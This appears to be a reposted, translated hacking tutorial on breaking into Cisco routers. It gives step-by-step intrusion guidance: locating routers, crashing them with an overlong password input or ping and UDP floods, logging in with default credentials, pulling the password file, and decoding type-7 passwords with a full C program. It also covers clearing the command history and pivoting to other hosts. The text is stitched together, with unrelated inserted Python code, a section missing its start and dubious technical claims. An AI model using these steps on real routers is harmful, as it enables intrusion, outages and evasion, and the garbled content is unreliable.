SoFunction
Updated on 2025-04-09

Attacking CISCO routers

The original text comes from BlackSun; this translation is by "Wake up from dreams". This is a very good article, and I am very happy to share it with you!

Warning:

Do not use this to damage Cisco systems or to access systems illegally. This article is for learning only; it may be used only for lawful purposes and must not be used to damage any system. It shows, step by step, how the flaws it describes can be exploited to gain unauthorized access. If you break into a Cisco router or disrupt it, you will cut off hundreds of network clients and cause heavy losses. So do this only where you are permitted to; otherwise you will be in a lot of trouble!

----------------------------------------------------------------------------------------------

Table of contents:

----------------------------------------------------------------------------------------------

What you need to know before reading:

-What is an IP address?

-What is an ISP?

-What is a TCP/IP packet?

-How to hide your IP address?

-How to use Telnet?

-How to use HyperTerminal?

-How to use Ping?

-How to use TraceRoute?

-How to use a proxy server?

----------------------------------------------------------------------------------------------

- Part 1: Why attack a Cisco router?

- Part 2: How to find a Cisco router?

- Part 3: How to break into a Cisco router?

- Part 4: How to crack the password?

- Part 5: How to use a Cisco router?

----------------------------------------------------------------------------------------------

What you need to know before reading:

----------------------------------------------------------------------------------------------

What is an IP address?

IP is the abbreviation of Internet Protocol. Computers use IP addresses to identify other computers on the network and connect to them. That is also how someone on IRC can find out your ISP and your approximate location. IP addresses are easy to obtain; basically they can be got in the following ways:

- When you visit a website, your IP is recorded.

- On IRC, someone can get your IP address.

- On ICQ or OICQ, your IP address can be obtained with a few simple tools.

- If someone is connected to your computer, running systat shows the connected computers (displayed as IP addresses).

- Someone sends you an e-mail containing a Java program, and it reports your IP address.

There are many other ways to get an IP address, including using certain *s and backdoor programs.

-----------

What is an ISP?

ISP is the abbreviation of Internet Service Provider; it is the company through which you connect to the Internet, and you are connected to it as soon as you dial in. We can run a traceroute (route tracing) to find our ISP (traceroute is introduced later).

You should see something like this:

tracert 222.222.22.22

Tracing route to [221.223.24.54]

over a maximum of 30 hops.

1 147ms 122ms 132ms [222.222.22.21]<<< Your ISP


Article entry: csh     Editor in charge: csh

2 122ms 143ms 123ms [222.222.22.20]

Preferences. You can change the buffer size here.

You can also turn "local echo" on or off. With local echo on, your computer displays whatever you type, and the computer you are connected to displays its response as well.

So you will see something like this:

You type "hello", and what you see is

hhelelollo

This is because the returned information is mixed with the content you entered. The only reason I do this is to see if the connected machine responds to my input.

By default, telnet connects to the telnet port, that is, port 23. You are not limited to port 23: when you connect, you can change the port as you like. You can change it to 25, the port of the mail service, or to 21, the port of FTP. There are thousands of ports in total, so you have to choose the right one!

-----------------------------------------------------------------------------------------------

How to use HyperTerminal?

HyperTerminal lets your computer listen on any port; if data arrives on that port, it can receive it and transfer files. HyperTerminal is under Start > Programs > Accessories > Communications; if it is not there, you can install it from the Control Panel. First choose the connection protocol: select "TCP/IP Winsock", then enter the computer you want to connect to and select the port below. You can choose Call > Wait for Call to wait for an incoming call. That way other computers can connect to you on a certain port, and you can chat or transfer files.

Note: My HyperTerminal may be different; it does not have this function.

----------------------------------------------------------------------------------------------

How to use Ping?

Ping is very simple to use. In MS-DOS mode, enter "ping IP address". By default it pings three times, and you can also set the count yourself.

"ping IP address -t" makes it ping continuously.

To change the size of the ping packet: "ping -l (size)".

ping actually sends data packets to the remote machine; when the remote machine receives them, it returns them unchanged. We can see how long this takes: the shorter the time, the faster the connection. Of course, packets are lost when the link is congested. Ping slows down the pinged computer, and can even bring it down when the traffic is high enough. A minute of ping attack can crash a Win98 computer (because its connection buffer overflows: too many connections, and Windows decides to take a rest :>). A ping attack also takes up a lot of your own bandwidth, so your bandwidth needs to be larger than the target machine's (unless the target runs Windows 98 and you have a good modem, in which case you can knock it off the stage within a minute).

Ping attacks have no effect on strong systems.

Note: DOS's -t option is not a ping attack; it only sends small packets with long intervals between them. On Unix or Linux machines you can use the -f parameter to perform a real ping flood. Actually, any POSIX-compliant distribution (POSIX: Portable Operating System Interface based on UNIX) has it; otherwise it is not a real Unix/Linux distribution. So if your OS calls itself Unix or Linux, you have -f.

-----------------------------------------------------------------------------------------------

How to use TraceRoute?

To track your connection (you can observe the route to the target machine), just enter "tracert IP address" in MS-DOS mode. You will see a list of computers: these are the machines your packets pass between you and the target.

You can use this to determine whether a firewall is present, or to determine someone's ISP (Internet service provider).

To determine the ISP, just look at the IP address immediately before the target machine; it should be the ISP's router.

Basically, this is how traceroute works. A TCP/IP packet carries a value in its header (the IP header; if you don't know what that means, it's fine, just keep reading) called TTL, short for Time To Live. Every router the packet passes decrements its TTL. Without this, packets could roam around the network forever and consume bandwidth, so whenever a packet's TTL reaches 0, it is discarded and an ICMP error is returned to the sender. Traceroute first sends a packet with a TTL of 1, which comes back right away; by checking the header of the ICMP error, traceroute knows where the packet got to in the first step. Then it sends a packet with a TTL of 2, and when that comes back it knows the second hop. It goes on one hop at a time until the final destination, and so you learn the entire path.


Do you understand now? :-)
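The TTL mechanism just described, as an added example that is not part of the original article: a small Python model of a path in which every router decrements the probe's TTL and the hop where it expires answers with an ICMP error, plus one hop that stays silent (the firewall case mentioned above). The addresses and the path are constructed, not measured.

```python
from dataclasses import dataclass


@dataclass
class Router:
    """One hop on the path. A 'silent' hop drops expired probes without replying,
    the behaviour the text attributes to a firewall (constructed model, not a real device)."""
    address: str
    silent: bool = False


@dataclass
class Path:
    routers: list
    target: str

    def probe(self, ttl):
        """Forward one probe along the path.
        Returns (responder, kind) or None when nobody answers."""
        for router in self.routers:
            ttl -= 1                      # every router it passes decrements the TTL
            if ttl == 0:                  # expired here: this router returns ICMP time exceeded
                return None if router.silent else (router.address, "time-exceeded")
        return (self.target, "echo-reply")  # TTL survived the whole path: the target replies


def traceroute(path, max_hops=30):
    """Probe with TTL 1, 2, 3, ... and record who answered each time."""
    hops = []
    for ttl in range(1, max_hops + 1):
        answer = path.probe(ttl)
        if answer is None:
            hops.append("*")              # timeout: the probe was dropped silently
            continue
        responder, kind = answer
        hops.append(responder)
        if kind == "echo-reply":          # destination reached, the trace is complete
            break
    return hops


def last_router_before_target(hops):
    """The article's rule of thumb: the hop just before the target is its ISP router."""
    return hops[-2] if len(hops) >= 2 else None


if __name__ == "__main__":
    # Constructed path: an ISP router, a silent firewall, a second router, then the target.
    path = Path([Router("222.222.22.21"), Router("10.0.0.1", silent=True),
                 Router("222.222.22.20")], "221.223.24.54")
    for n, hop in enumerate(traceroute(path), 1):
        print(n, hop)
```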

----------------------------------------------------------------------------------------------

How to use a proxy server?

Find a proxy server online, including which port it requires you to connect to. Once you have found one, you can connect to another computer through the proxy using telnet or HyperTerminal. That way the other computer cannot determine your IP address.

----------------------------------------------------------------------------------------------

Part 1: Why attack a Cisco router?

You might wonder... Why attack the cisco router?

The answer is that it is very useful for breaking into other systems...

Cisco routers are very fast; in some systems one is connected to as many as 18 T1 lines. They are also very flexible: although most of them only run telnet, they can still be used for DoS attacks or to attack other systems.

They also have thousands of packets passing through them, which can be captured and decoded... Many Cisco routers are trusted by the systems behind them, which lets you find out exactly how many other computers are on their network.

-----------------------------------------------------------------------------------------------

Part 2: How to find a Cisco router?

Finding a Cisco router is a simple task; almost every ISP's traffic passes through at least one. The easiest way is to run tracert under DOS: you can trace through the many computers between you and another machine, and there is bound to be one with "cisco" in its name. When you find it, note its IP address.

Note: In China the name may not contain "cisco", but there is bound to be a router. You can use SuperScan to scan the first two IP addresses and see which one has port 2001 (Cisco router management) and port 23 open!

Now you have the location of the Cisco router, but it may be protected by a firewall, so you have to check whether it is blocked: ping it a few times, and if it responds it may not be blocked. Another way is to try some of the Cisco router's ports. Just use telnet on port 23; if it asks for a password but not for a username, you may be looking at a firewall.

Try to find a router that is not protected by a firewall, because the topic of this tutorial is routers, not how to get past a firewall. When you are sure you have found a good system, find a proxy server that lets you use port 23, so that your IP address is not recorded by the router. Note: just find a machine running Wingate.

-----------------------------------------------------------------------------------------------

Part 3: How to break into a Cisco router?

Cisco routers running version 4.1 (the commonly used version now) are easy to take down. You just connect to the Cisco router through a proxy server and enter a very long string as the password, such as:

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

Now wait. The Cisco system will restart; you could say you have attacked it and knocked it offline... but after 2 to 10 minutes it will recover, and that is when we should get in.

If nothing happens, it is not running the vulnerable software. You can try a few more DoS attacks, such as a flood of pings: enter "ping -l 56550 -t" under DOS, which has the same effect.

Note: It is very likely that neither of the above methods works. In any case you need it to crash. Then try the udpFlood that was used against Yahoo, which will certainly crash it. Be very careful! I believe you know how to protect yourself.


Once it comes back, find another proxy server to connect through. The username is "admin" and the password is "admin", because that is the default.

This is because, when it is temporarily disabled, it returns to the default state.

Note: On my homepage there is an article listing the default usernames and passwords of almost all routers.

Now that you are in, you should get the password file! Systems run different software, but most of them have a prompt like "htl-textil". Enter "?" to see the help: you will see a lot of commands, among them a transfer command. With this command, as the current Admin user, send the password file to port 23 of your computer. Before that, though, you have to set up your HyperTerminal. After you send the file, HyperTerminal asks whether you want to receive it; select Yes and save it on your computer. Then disconnect. You have got past the hardest part; now get ready to crack the password, as described below.

-----------------------------------------------------------------------------------------------

Part 4: How to crack the password?

Now that you have the password file, you have to crack it in order to get further into the router. You can run software such as John the Ripper to decipher it.

This is the easiest way, and the one I recommend. The other way is to try decoding it. That requires decoding software, and you need enough patience when using it.

Here is a program that specifically decodes Cisco router password files; you can compile it under Linux:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* Cisco "type 7" translation table as given in this listing (22 bytes).
   It is a prefix of the full table used by IOS, so a password long enough
   to run past its end is rejected instead of being read out of bounds. */
static const char xlat[] = {
        0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
        0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
        0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};

static const char pw_str1[] = "password 7 ";
static const char pw_str2[] = "enable-password 7 ";

static const char *pname;

/* Decode one type-7 string: two decimal digits give the starting index into
   xlat[], and each following pair of hex digits is one password byte XORed
   with xlat[seed], xlat[seed + 1], ...  Returns 0 on success, -1 on bad input. */
static int cdecrypt(const char *enc_pw, char *dec_pw)
{
        unsigned int seed, i, len, val;

        len = strlen(enc_pw);
        if (len < 2 || (len & 1))
                return -1;

        if (!isdigit((unsigned char)enc_pw[0]) || !isdigit((unsigned char)enc_pw[1]))
                return -1;
        seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';
        if (seed > 15)
                return -1;

        for (i = 2; i < len; i += 2) {
                int hi = toupper((unsigned char)enc_pw[i]);
                int lo = toupper((unsigned char)enc_pw[i + 1]);

                if (!isxdigit(hi) || !isxdigit(lo))
                        return -1;
                if (seed >= sizeof(xlat))       /* table here is too short for this password */
                        return -1;
                val = (isdigit(hi) ? hi - '0' : hi - 'A' + 10) * 16
                    + (isdigit(lo) ? lo - '0' : lo - 'A' + 10);
                dec_pw[i / 2 - 1] = (char)(val ^ xlat[seed++]);
        }
        dec_pw[len / 2 - 1] = '\0';
        return 0;
}

/* The argument placeholders were lost in this listing; they are restored
   from how main() uses its arguments. */
static void usage(void)
{
        fprintf(stdout, "Usage: %s -p ENCRYPTED_PASSWORD\n", pname);
        fprintf(stdout, "       %s CONFIG_FILE [OUTPUT_FILE]\n", pname);
}

int main(int argc, char **argv)
{
        FILE *in = stdin, *out = stdout;
        char line[257];
        char passwd[65];
        unsigned int i, pw_pos;
        int c;

        pname = argv[0];

        if (argc > 1) {
                if (argc > 3) {
                        usage();
                        exit(1);
                }
                if (argv[1][0] == '-') {
                        switch (argv[1][1]) {
                        case 'h':
                                usage();
                                break;
                        case 'p':
                                if (argc < 3) {         /* -p needs the encrypted string */
                                        usage();
                                        exit(1);
                                }
                                if (cdecrypt(argv[2], passwd)) {
                                        fprintf(stderr, "Error.\n");
                                        exit(1);
                                }
                                fprintf(stdout, "password: %s\n", passwd);
                                break;
                        default:
                                fprintf(stderr, "%s: unknown option.\n", pname);
                        }
                        return 0;
                }
                if ((in = fopen(argv[1], "rt")) == NULL)
                        exit(1);
                if (argc > 2)
                        if ((out = fopen(argv[2], "wt")) == NULL)
                                exit(1);
        }

        /* File mode: copy the configuration through, replacing every
           "password 7" line with its decoded plaintext. */
        while (1) {
                for (i = 0; i < 256; i++) {
                        if ((c = fgetc(in)) == EOF) {
                                if (i)
                                        break;          /* last line without newline */
                                fclose(in);
                                fclose(out);
                                return 0;
                        }
                        if (c == '\r') {                /* drop the CR of CRLF endings */
                                i--;
                                continue;
                        }
                        if (c == '\n')
                                break;
                        line[i] = (char)c;
                }
                line[i] = '\0';

                pw_pos = 0;
                if (!strncmp(line, pw_str1, strlen(pw_str1)))
                        pw_pos = strlen(pw_str1);
                if (!strncmp(line, pw_str2, strlen(pw_str2)))
                        pw_pos = strlen(pw_str2);

                if (!pw_pos) {
                        fprintf(out, "%s\n", line);     /* not a password line: pass through */
                        continue;
                }

                if (cdecrypt(&line[pw_pos], passwd)) {
                        fprintf(stderr, "Error.\n");
                        exit(1);
                }
                fprintf(out, "%s%s\n",
                        pw_pos == strlen(pw_str1) ? pw_str1 : pw_str2, passwd);
        }
}

If you are not using Linux, you have to use software like John the Ripper: feed it your password file and crack it.
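As an added example (not the article's program, and written from the defender's side), the same type-7 decoding in Python applied as a configuration audit: it finds "password 7" and plaintext credentials in a Cisco configuration and shows that the type-7 ones read straight back, which is the reason such lines should be replaced by hashed secrets. It uses the full IOS translation table, of which the listing's 22-byte xlat[] is a prefix; the sample configuration is constructed.

```python
import re

# Full IOS type-7 translation table; the article's 22-byte xlat[] is its prefix.
XLAT = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def type7_decode(enc):
    """Two decimal seed digits followed by hex pairs -> plaintext.
    Each byte is XORed with the table entry at (seed + position)."""
    if len(enc) < 4 or len(enc) % 2 or not enc[:2].isdigit():
        raise ValueError("malformed type-7 string")
    seed = int(enc[:2])
    if seed > 15:
        raise ValueError("seed out of range")
    data = bytes.fromhex(enc[2:])
    return bytes(b ^ XLAT[(seed + k) % len(XLAT)] for k, b in enumerate(data)).decode()


# Common credential lines: 'enable password 7 ...', 'username X password 7 ...',
# ' password 0 ...' under a line section, 'enable secret 5 ...'. Other forms are not covered.
CRED_RE = re.compile(r"^\s*(?:enable\s+)?(?:username\s+\S+\s+)?(password|secret)\s+(\d)\s+(\S+)")


def audit_config(text):
    """Return (line_no, finding, detail) for every credential that can be read back."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        m = CRED_RE.match(line)
        if not m:
            continue
        _keyword, ptype, value = m.groups()
        if ptype == "0":                       # type 0: stored in the clear
            findings.append((no, "plaintext", value))
        elif ptype == "7":                     # type 7: reversible, so show the plaintext
            try:
                findings.append((no, "reversible type 7", type7_decode(value)))
            except ValueError:
                findings.append((no, "malformed type 7", value))
    return findings                            # type 5 and newer hashes are not flagged


# Constructed sample configuration (not from any real device); the secret 5 hash is a placeholder.
SAMPLE_CONFIG = """\
hostname edge-rtr
enable password 7 094F471A1A0A
enable secret 5 $1$EXAMPLE$PLACEHOLDER-HASH
username admin password 7 0005170B0D55
line vty 0 4
 password 0 letmein
"""

if __name__ == "__main__":
    for no, finding, detail in audit_config(SAMPLE_CONFIG):
        print(f"line {no}: {finding}: {detail}")
```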

-----------------------------------------------------------------------------------------------

Part 5: How to use a Cisco router?

To use it, you must first connect to it; use a proxy so that your IP address is not recorded. Once you are in, if you want to turn off the history to hide your actions, just type "terminal history size 0". That way nothing of yours is recorded! Enter "?" to see the router's commands, most of which you can use.

These routers generally have telnet, so you can telnet from them to other systems (such as Unix boxes) and attack those. You can also use ping and traceroute to trace systems, or carry out DoS attacks. You can also sniff packets, but I do not recommend it, because it does not always succeed and you will be discovered...

----------------------------------------------------------------------------------------------

If you don't succeed the first time you attack a Cisco, don't worry... you won't succeed in one or two tries. It takes constant practice and great stamina.

This only shows you what you can do... it must be done legally!

--- Excerpted from "United Nations League"
